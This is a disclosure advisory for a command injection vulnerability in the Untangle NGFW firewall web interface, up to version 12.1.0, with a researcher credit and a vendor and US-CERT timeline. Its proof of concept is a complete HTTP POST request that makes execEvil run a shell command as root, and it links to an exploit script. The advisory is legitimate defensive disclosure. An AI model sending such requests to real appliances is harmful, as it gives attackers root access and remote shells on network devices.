Product: https://www.untangle.com/untangle-ng-firewall/ Description: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') The Untangle NGFW <= 12.1.0 web interface is prone to a command injection vulnerability, allowing non-root users to execute arbitrary commands with root privileges and gain remote shell access to the appliance. This vulnerability can be triggered via modifying any request made via functionality accessible from the Network->Troubleshooting->Network Tests window using an intercepting proxy or with otherwise crafted requests to abuse the execEvil() function. The appliance web interface is accessible via unsecured HTTP by default. This leaves the appliance vulnerable to Man-in-the-Middle attacks that allow attackers to intercept plaintext credentials, facilitating exploitation of this vulnerability for further elevation of privileges. Solution: No official solution is currently available. Restrict access, consider Administrator interface access equivalent to root privileges. Vulnerability Discovery: Matthew Bush (The Missing Link) Proof of Concept: With a local intercepting proxy, alter the "params" field for any POST request to execEvil to execute any arbitrary command (eg, using the Ping Test) once logged in and assigned a nonce value for the session: --- POST http://192.168.68.154/webui/JSON-RPC HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: text/plain Content-Length: 99 Cookie: JSESSIONID=3C6A2963EFB628FA83AF6B6563222C6F; pysid=ce0629f79bd506f9543381e7eb7d7b7a Connection: keep-alive Host: 192.168.68.154 {"id":5,"nonce":"fbejsu4c77toq8a5igr1320i2p","method":".obj#2082962752.execEvil","params":["id"]} --- Exploit: https://github.com/3xocyte/Exploits/blob/master/untangle-ngfw-12.1-ci.py Disclosure Timeline: 22/4/2016 Attempted to contact vendor after discovery of vulnerabilities 6/5/2016 No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103) 12/5/2016 US-CERT confirms contacting vendor 16/6/2016 US-CERT notifies of no response from vendor, suggested requesting CVE-ID via mailing list 27/6/2016 Public disclosure Discovery Credit: Matt Bush (@3xocyte) The Missing Link (Sydney, Australia)
